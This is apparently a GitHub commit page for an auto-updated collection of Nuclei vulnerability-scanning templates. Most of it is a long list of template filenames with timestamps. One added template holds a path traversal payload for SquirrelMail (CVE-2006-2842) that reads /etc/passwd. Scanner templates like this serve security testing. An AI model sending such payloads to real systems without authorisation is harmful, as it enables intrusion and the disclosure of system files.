Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Nov 22, 2024
1 parent 0f3d76a commit 374e197
Show file tree
Hide file tree
Showing 8,383 changed files with 497,703 additions and 689,336 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
522 changes: 297 additions & 225 deletions README.md

Large diffs are not rendered by default.

3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -257,5 +257,6 @@
"2024-11-18": 46326,
"2024-11-19": 46344,
"2024-11-20": 46447,
"2024-11-21": 46439
"2024-11-21": 46439,
"2024-11-22": 46515
}
275 changes: 274 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -55571,5 +55571,278 @@
"CVE-2021-24498-5755.yaml": "2024-11-21 02:34:48",
"CVE-2014-4940-2382.yaml": "2024-11-21 02:34:48",
"CVE-2011-5181-2117.yaml": "2024-11-21 02:34:48",
"cve-2014-4558-2371.yaml": "2024-11-21 02:34:48"
"cve-2014-4558-2371.yaml": "2024-11-21 02:34:48",
"807515113.yaml": "2024-11-22 02:35:15",
"2570525576.yaml": "2024-11-22 02:35:15",
"1897115000.yaml": "2024-11-22 02:35:15",
"3020537829.yaml": "2024-11-22 02:35:15",
"840401525.yaml": "2024-11-22 02:35:15",
"2989783729.yaml": "2024-11-22 02:35:15",
"316786365.yaml": "2024-11-22 02:35:15",
"4088014974.yaml": "2024-11-22 02:35:15",
"4240453538.yaml": "2024-11-22 02:35:15",
"959515023.yaml": "2024-11-22 02:35:15",
"487597526.yaml": "2024-11-22 02:35:15",
"187571951.yaml": "2024-11-22 02:35:15",
"2376867242.yaml": "2024-11-22 02:35:15",
"1283250060.yaml": "2024-11-22 02:35:15",
"2230685271.yaml": "2024-11-22 02:35:15",
"2623190658.yaml": "2024-11-22 02:35:15",
"Swagger.yaml": "2024-11-22 02:35:15",
"1626980635.yaml": "2024-11-22 02:35:15",
"61830093.yaml": "2024-11-22 02:35:15",
"2167015698.yaml": "2024-11-22 02:35:15",
"4085581949.yaml": "2024-11-22 02:35:15",
"4142363606.yaml": "2024-11-22 02:35:15",
"3170504396.yaml": "2024-11-22 02:35:15",
"3841393894.yaml": "2024-11-22 02:35:15",
"1765842777.yaml": "2024-11-22 02:35:15",
"515297371.yaml": "2024-11-22 02:35:15",
"453789592.yaml": "2024-11-22 02:35:15",
"2667740598.yaml": "2024-11-22 02:35:15",
"3334421219.yaml": "2024-11-22 02:35:15",
"585108827.yaml": "2024-11-22 02:35:15",
"1540122430.yaml": "2024-11-22 02:35:15",
"2027083354.yaml": "2024-11-22 02:35:15",
"533176455.yaml": "2024-11-22 02:35:15",
"1366422686.yaml": "2024-11-22 02:35:15",
"559671807.yaml": "2024-11-22 02:35:15",
"3155115679.yaml": "2024-11-22 02:35:15",
"2866839075.yaml": "2024-11-22 02:35:15",
"90969961.yaml": "2024-11-22 02:35:15",
"3963267632.yaml": "2024-11-22 02:35:15",
"4147439962.yaml": "2024-11-22 02:35:15",
"636129119.yaml": "2024-11-22 02:35:15",
"2751898212.yaml": "2024-11-22 02:35:15",
"124984706.yaml": "2024-11-22 02:35:15",
"2858598636.yaml": "2024-11-22 02:35:15",
"1915143880.yaml": "2024-11-22 02:35:15",
"cve-2021-39316-6330.yaml": "2024-11-22 02:35:15",
"CVE-2012-4768-2207.yaml": "2024-11-22 02:35:15",
"CVE-2024-9111.yaml": "2024-11-22 02:35:15",
"CVE-2024-11365.yaml": "2024-11-22 02:35:15",
"cve-2019-15858-3891.yaml": "2024-11-22 02:35:15",
"CVE-2015-1000012-2462.yaml": "2024-11-22 02:35:15",
"CVE-2024-11388.yaml": "2024-11-22 02:35:15",
"cve-2020-35489-5045.yaml": "2024-11-22 02:35:15",
"CVE-2024-10682.yaml": "2024-11-22 02:35:15",
"CVE-2021-24235-5652.yaml": "2024-11-22 02:35:15",
"include-mastodon-feed.yaml": "2024-11-22 02:35:15",
"CVE-2019-19134-4032.yaml": "2024-11-22 02:35:15",
"CVE-2021-24987-5776.yaml": "2024-11-22 02:35:15",
"CVE-2011-4926-2087.yaml": "2024-11-22 02:35:15",
"cve-2022-1904(1).yaml": "2024-11-22 02:35:15",
"cve-2021-24498-5754.yaml": "2024-11-22 02:35:15",
"CVE-2022-0149-6607.yaml": "2024-11-22 02:35:15",
"CVE-2017-5487-3023.yaml": "2024-11-22 02:35:15",
"forumengine.yaml": "2024-11-22 02:35:15",
"cve-2016-10033-2745.yaml": "2024-11-22 02:35:15",
"CVE-2022-0422(1).yaml": "2024-11-22 02:35:15",
"CVE-2021-25075(1).yaml": "2024-11-22 02:35:15",
"cve-2020-24312-4806.yaml": "2024-11-22 02:35:15",
"CVE-2021-24762-5766.yaml": "2024-11-22 02:35:15",
"CVE-2019-14205-3822.yaml": "2024-11-22 02:35:15",
"cve-2017-17043-2977.yaml": "2024-11-22 02:35:15",
"CVE-2015-5471-2557.yaml": "2024-11-22 02:35:15",
"CVE-2024-11412.yaml": "2024-11-22 02:35:15",
"CVE-2022-27849-6741.yaml": "2024-11-22 02:35:15",
"CVE-2020-11738-4428.yaml": "2024-11-22 02:35:15",
"CVE-2014-4513-2341.yaml": "2024-11-22 02:35:15",
"CVE-2024-11409.yaml": "2024-11-22 02:35:15",
"CVE-2016-1000134-2678.yaml": "2024-11-22 02:35:15",
"cve-2020-24186-4793.yaml": "2024-11-22 02:35:15",
"CVE-2021-25028-5784.yaml": "2024-11-22 02:35:15",
"ultimate-youtube-video-player.yaml": "2024-11-22 02:35:15",
"CVE-2011-4618-2071.yaml": "2024-11-22 02:35:15",
"friendly-functions-for-welcart.yaml": "2024-11-22 02:35:15",
"cve-2018-20462-3494.yaml": "2024-11-22 02:35:15",
"CVE-2024-10675.yaml": "2024-11-22 02:35:15",
"cve-2016-10956-2762.yaml": "2024-11-22 02:35:15",
"pure-css-circle-progress-bar.yaml": "2024-11-22 02:35:15",
"CVE-2024-11438.yaml": "2024-11-22 02:35:15",
"CVE-2011-5265-2119.yaml": "2024-11-22 02:35:15",
"CVE-2020-11738-4425.yaml": "2024-11-22 02:35:15",
"CVE-2018-5316-3568.yaml": "2024-11-22 02:35:15",
"cve-2018-9118-3654.yaml": "2024-11-22 02:35:15",
"CVE-2012-5913-2226.yaml": "2024-11-22 02:35:15",
"cve-2019-16931-3963.yaml": "2024-11-22 02:35:15",
"cve-2020-14092-4538.yaml": "2024-11-22 02:35:15",
"cve-2011-5179-2105.yaml": "2024-11-22 02:35:15",
"cve-2021-24300(1).yaml": "2024-11-22 02:35:15",
"CVE-2021-24510-5759.yaml": "2024-11-22 02:35:15",
"CVE-2019-6112-4173.yaml": "2024-11-22 02:35:15",
"CVE-2021-24146-5629.yaml": "2024-11-22 02:35:15",
"CVE-2024-11435.yaml": "2024-11-22 02:35:15",
"stream-status-for-twitch.yaml": "2024-11-22 02:35:15",
"CVE-2024-9442.yaml": "2024-11-22 02:35:15",
"CVE-2020-26876-4926.yaml": "2024-11-22 02:35:15",
"cve-2014-4539-2355.yaml": "2024-11-22 02:35:15",
"cve-2016-1000153-2736.yaml": "2024-11-22 02:35:15",
"cve-2021-25120-5806.yaml": "2024-11-22 02:35:15",
"recipepress-reloaded.yaml": "2024-11-22 02:35:15",
"CVE-2024-10796.yaml": "2024-11-22 02:35:15",
"CVE-2022-0595(1).yaml": "2024-11-22 02:35:15",
"CVE-2024-11370.yaml": "2024-11-22 02:35:15",
"CVE-2021-24342-5713.yaml": "2024-11-22 02:35:15",
"cve-2021-24288-5678.yaml": "2024-11-22 02:35:15",
"CVE-2024-11354.yaml": "2024-11-22 02:35:15",
"cve-2018-3810-3558.yaml": "2024-11-22 02:35:15",
"page-parts.yaml": "2024-11-22 02:35:15",
"CVE-2021-24278-5669.yaml": "2024-11-22 02:35:15",
"CVE-2024-11334.yaml": "2024-11-22 02:35:15",
"CVE-2024-10726.yaml": "2024-11-22 02:35:15",
"CVE-2022-0218-6615.yaml": "2024-11-22 02:35:15",
"CVE-2024-11432.yaml": "2024-11-22 02:35:15",
"CVE-2020-35951-5106.yaml": "2024-11-22 02:35:15",
"CVE-2021-24997-5782.yaml": "2024-11-22 02:35:15",
"cve-2021-24226-5645.yaml": "2024-11-22 02:35:15",
"CVE-2015-4694-2542.yaml": "2024-11-22 02:35:15",
"cve-2021-24891(1).yaml": "2024-11-22 02:35:15",
"button-block.yaml": "2024-11-22 02:35:15",
"CVE-2022-0189-6611.yaml": "2024-11-22 02:35:15",
"CVE-2017-17451-2981.yaml": "2024-11-22 02:35:15",
"grey-owl-lightbox.yaml": "2024-11-22 02:35:15",
"CVE-2019-9978-4326.yaml": "2024-11-22 02:35:15",
"CVE-2024-10164.yaml": "2024-11-22 02:35:15",
"my-contador-wp.yaml": "2024-11-22 02:35:15",
"CVE-2021-25111-5803.yaml": "2024-11-22 02:35:15",
"CVE-2024-11197.yaml": "2024-11-22 02:35:15",
"cve-2019-15858-3892.yaml": "2024-11-22 02:35:15",
"CVE-2021-24364-5721.yaml": "2024-11-22 02:35:15",
"cve-2020-28976-4990.yaml": "2024-11-22 02:35:15",
"CVE-2024-11456.yaml": "2024-11-22 02:35:15",
"CVE-2020-17362-4659.yaml": "2024-11-22 02:35:15",
"cve-2016-1000137-2693.yaml": "2024-11-22 02:35:15",
"CVE-2011-4624-2080.yaml": "2024-11-22 02:35:15",
"CVE-2024-11416.yaml": "2024-11-22 02:35:15",
"cve-2021-24358-5716.yaml": "2024-11-22 02:35:15",
"CVE-2024-9542.yaml": "2024-11-22 02:35:15",
"cve-2020-11930-4444.yaml": "2024-11-22 02:35:15",
"cve-2019-20210(1).yaml": "2024-11-22 02:35:15",
"CVE-2021-39322-6339.yaml": "2024-11-22 02:35:15",
"CVE-2022-0591-6637.yaml": "2024-11-22 02:35:15",
"CVE-2024-11447.yaml": "2024-11-22 02:35:15",
"CVE-2024-10172.yaml": "2024-11-22 02:35:15",
"CVE-2024-10782.yaml": "2024-11-22 02:35:15",
"CVE-2022-0271-6616.yaml": "2024-11-22 02:35:15",
"CVE-2016-1000135-2685.yaml": "2024-11-22 02:35:15",
"subaccounts-for-woocommerce.yaml": "2024-11-22 02:35:15",
"cve-2014-9094-2416.yaml": "2024-11-22 02:35:15",
"CVE-2024-9851.yaml": "2024-11-22 02:35:15",
"suevafree-essential-kit.yaml": "2024-11-22 02:35:15",
"shine-pdf.yaml": "2024-11-22 02:35:15",
"CVE-2024-10528.yaml": "2024-11-22 02:35:15",
"CVE-2024-11440.yaml": "2024-11-22 02:35:15",
"CVE-2012-2371-2175.yaml": "2024-11-22 02:35:15",
"cve-2019-6715-4190.yaml": "2024-11-22 02:35:15",
"cve-2021-25074-5799.yaml": "2024-11-22 02:35:15",
"CVE-2024-10532.yaml": "2024-11-22 02:35:15",
"theme-builder-for-elementor.yaml": "2024-11-22 02:35:15",
"salavat-counter.yaml": "2024-11-22 02:35:15",
"cf7-email-add-on.yaml": "2024-11-22 02:35:15",
"CVE-2022-1597-6652.yaml": "2024-11-22 02:35:15",
"grid-view-gallery.yaml": "2024-11-22 02:35:15",
"cve-2021-24316-5689.yaml": "2024-11-22 02:35:15",
"cve-2021-25052-5790.yaml": "2024-11-22 02:35:15",
"CVE-2011-5106-2093.yaml": "2024-11-22 02:35:15",
"CVE-2014-4544-2360.yaml": "2024-11-22 02:35:15",
"CVE-2020-26153-4913.yaml": "2024-11-22 02:35:15",
"CVE-2012-0896-2132.yaml": "2024-11-22 02:35:15",
"cve-2021-24838-5770.yaml": "2024-11-22 02:35:15",
"cve-2016-1000141-2710.yaml": "2024-11-22 02:35:15",
"CVE-2024-10623.yaml": "2024-11-22 02:35:15",
"cve-2013-4117-2265.yaml": "2024-11-22 02:35:15",
"cve-2018-8719-3640.yaml": "2024-11-22 02:35:15",
"CVE-2024-10890.yaml": "2024-11-22 02:35:15",
"CVE-2024-10788.yaml": "2024-11-22 02:35:15",
"cve-2017-18536-2993.yaml": "2024-11-22 02:35:15",
"CVE-2014-8799-2411.yaml": "2024-11-22 02:35:15",
"CVE-2024-10522.yaml": "2024-11-22 02:35:15",
"cve-2021-24499-5756.yaml": "2024-11-22 02:35:15",
"CVE-2024-10792.yaml": "2024-11-22 02:35:15",
"CVE-2021-24495-5747.yaml": "2024-11-22 02:35:15",
"cve-2021-34643-6238.yaml": "2024-11-22 02:35:15",
"CVE-2019-14470-3851.yaml": "2024-11-22 02:35:15",
"CVE-2024-10316.yaml": "2024-11-22 02:35:15",
"CVE-2024-11385.yaml": "2024-11-22 02:35:15",
"CVE-2024-11428.yaml": "2024-11-22 02:35:15",
"wip-incoming-lite.yaml": "2024-11-22 02:35:15",
"CVE-2012-4273-2197.yaml": "2024-11-22 02:35:15",
"CVE-2024-11089.yaml": "2024-11-22 02:35:15",
"cve-2011-5107-2102.yaml": "2024-11-22 02:35:15",
"tour-operator.yaml": "2024-11-22 02:35:15",
"CVE-2021-21389-5509.yaml": "2024-11-22 02:35:15",
"CVE-2022-0148-6604.yaml": "2024-11-22 02:35:15",
"cve-2013-2287-2247.yaml": "2024-11-22 02:35:15",
"CVE-2016-1000128-2651.yaml": "2024-11-22 02:35:15",
"cve-2021-24947-5774.yaml": "2024-11-22 02:35:15",
"CVE-2024-11424.yaml": "2024-11-22 02:35:15",
"cve-2019-16525-3937.yaml": "2024-11-22 02:35:15",
"cve-2016-1000136-2689.yaml": "2024-11-22 02:35:15",
"CVE-2024-10393.yaml": "2024-11-22 02:35:15",
"cve-2015-5461-2555.yaml": "2024-11-22 02:35:15",
"CVE-2013-3526-2252.yaml": "2024-11-22 02:35:15",
"CVE-2024-11455.yaml": "2024-11-22 02:35:15",
"cve-2021-24472-5744.yaml": "2024-11-22 02:35:15",
"cve-2019-16932(1).yaml": "2024-11-22 02:35:15",
"void-visual-whmcs-element.yaml": "2024-11-22 02:35:15",
"slick-sitemap.yaml": "2024-11-22 02:35:15",
"cve-2021-24335-5701.yaml": "2024-11-22 02:35:15",
"cve-2016-1000143-2717.yaml": "2024-11-22 02:35:15",
"CVE-2014-9444-2423.yaml": "2024-11-22 02:35:15",
"cve-2014-4550-2364.yaml": "2024-11-22 02:35:15",
"CVE-2024-11414.yaml": "2024-11-22 02:35:15",
"cve-2014-4536-2350.yaml": "2024-11-22 02:35:15",
"cve-2014-4940-2381.yaml": "2024-11-22 02:35:15",
"CVE-2024-10785.yaml": "2024-11-22 02:35:15",
"CVE-2014-5368-2397.yaml": "2024-11-22 02:35:15",
"CVE-2015-4414-2527.yaml": "2024-11-22 02:35:15",
"CVE-2022-0952(1).yaml": "2024-11-22 02:35:15",
"CVE-2021-24176-5634.yaml": "2024-11-22 02:35:15",
"bard-extra.yaml": "2024-11-22 02:35:15",
"cve-2021-24991-5778.yaml": "2024-11-22 02:35:15",
"CVE-2012-0901-2138.yaml": "2024-11-22 02:35:15",
"cve-2020-12054-4458.yaml": "2024-11-22 02:35:15",
"dino-game.yaml": "2024-11-22 02:35:15",
"CVE-2021-24146-5630.yaml": "2024-11-22 02:35:15",
"cve-2019-15889-3904.yaml": "2024-11-22 02:35:15",
"cve-2016-10033-2749.yaml": "2024-11-22 02:35:15",
"lazy-load-videos-and-sticky-control.yaml": "2024-11-22 02:35:15",
"CVE-2024-10400.yaml": "2024-11-22 02:35:15",
"CVE-2022-0288(1).yaml": "2024-11-22 02:35:15",
"cve-2021-24406-5732.yaml": "2024-11-22 02:35:15",
"CVE-2024-10671.yaml": "2024-11-22 02:35:15",
"CVE-2011-5181-2116.yaml": "2024-11-22 02:35:15",
"cve-2016-1000131-2664.yaml": "2024-11-22 02:35:15",
"CVE-2024-11371.yaml": "2024-11-22 02:35:15",
"cve-2021-24340-5709.yaml": "2024-11-22 02:35:15",
"CVE-2024-10177.yaml": "2024-11-22 02:35:15",
"cve-2014-4561-2372.yaml": "2024-11-22 02:35:15",
"CVE-2013-4625-2270.yaml": "2024-11-22 02:35:15",
"CVE-2022-0653-6639.yaml": "2024-11-22 02:35:15",
"cve-2015-2807-2497.yaml": "2024-11-22 02:35:15",
"CVE-2024-10696.yaml": "2024-11-22 02:35:15",
"cve-2020-35749-5073.yaml": "2024-11-22 02:35:15",
"CVE-2024-11360.yaml": "2024-11-22 02:35:15",
"cve-2020-12800-4486.yaml": "2024-11-22 02:35:15",
"cve-2022-0201(1).yaml": "2024-11-22 02:35:15",
"CVE-2024-11088.yaml": "2024-11-22 02:35:15",
"CVE-2018-3810-3555.yaml": "2024-11-22 02:35:15",
"cve-2021-39312-6327.yaml": "2024-11-22 02:35:15",
"CVE-2017-18598-2997.yaml": "2024-11-22 02:35:15",
"cve-2020-13700-4513.yaml": "2024-11-22 02:35:15",
"CVE-2021-24298-5686.yaml": "2024-11-22 02:35:15",
"CVE-2021-24316-5692.yaml": "2024-11-22 02:35:15",
"cve-2021-24389-5727.yaml": "2024-11-22 02:35:15",
"security-force.yaml": "2024-11-22 02:35:15",
"cve-2016-1000129-2654.yaml": "2024-11-22 02:35:15",
"CVE-2014-4558-2369.yaml": "2024-11-22 02:35:15",
"CVE-2021-24284(1).yaml": "2024-11-22 02:35:15",
"CVE-2016-1000130-2659.yaml": "2024-11-22 02:35:15",
"CVE-2016-1000154-2740.yaml": "2024-11-22 02:35:15",
"CVE-2024-9371.yaml": "2024-11-22 02:35:15",
"CVE-2021-24274-5658.yaml": "2024-11-22 02:35:15",
"CVE-2024-10898.yaml": "2024-11-22 02:35:15",
"CVE-2016-1000127-2644.yaml": "2024-11-22 02:35:15",
"CVE-2021-39320-6336.yaml": "2024-11-22 02:35:15"
}
31 changes: 0 additions & 31 deletions nuclei-templates/CVE-2006/CVE-2006-2842.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions nuclei-templates/CVE-2006/cve-2006-2842.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2006-2842

info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve

requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
30 changes: 0 additions & 30 deletions nuclei-templates/CVE-2007/CVE-2007-4504.yaml

This file was deleted.

Loading

0 comments on commit 374e197

Please sign in to comment.